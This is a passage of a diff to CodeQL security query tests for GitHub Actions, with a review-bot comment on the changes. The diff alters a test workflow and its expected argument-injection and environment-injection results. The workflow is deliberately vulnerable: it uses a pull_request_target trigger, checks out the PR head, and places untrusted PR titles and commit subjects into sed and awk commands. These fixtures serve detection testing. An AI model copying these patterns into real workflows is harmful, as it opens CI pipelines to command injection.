provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r 
'.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | 
@@ -72,5 +71,11 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> 
"$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 09e540a0f1b..59ea1564bdd 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -1,15 +1,18 @@ name: Argument injection on: - issues: - types: [opened, edited] + pull_request_target: jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.issue.title}} + TITLE: ${{github.event.pull_request.title}} steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - run: echo "s/FOO/$TITLE/g" - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar @@ -28,3 +31,6 @@ jobs: -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + BODY=$(git log --format=%s) + sed "s/FOO/$BODY/g" > /tmp/foo diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index b5df9a2cbd3..326cb935f7c 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
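Review bot: The step added in the second hunk of arg_injection.yml (`BODY=$(git log --format=%s)` followed by `sed "s/FOO/$BODY/g" > /tmp/foo`) has no comment naming its intended source and sink. It is only attacker-influenced because the first hunk switches the trigger to `pull_request_target` and checks out `github.event.pull_request.head.ref`. A comment above the step would record this, for example `# untrusted: commit subjects come from the PR head checked out above; expected sink: sed`. This matters for reading ArgumentInjectionCritical.expected, which lists the step twice, once with `git` and once with `sed` as the command. The `git` row appears to name the command that produces the data rather than the one that receives it, so it is worth confirming that row is intended before it is kept as a true positive. Separately, `%s` is the commit subject, so `BODY` is a misleading name for the variable.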
@@ -1,27 +1,30 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| 
.github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n 
| -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 73413f51a39..90e7101e5fd 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,19 +1,20 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| 
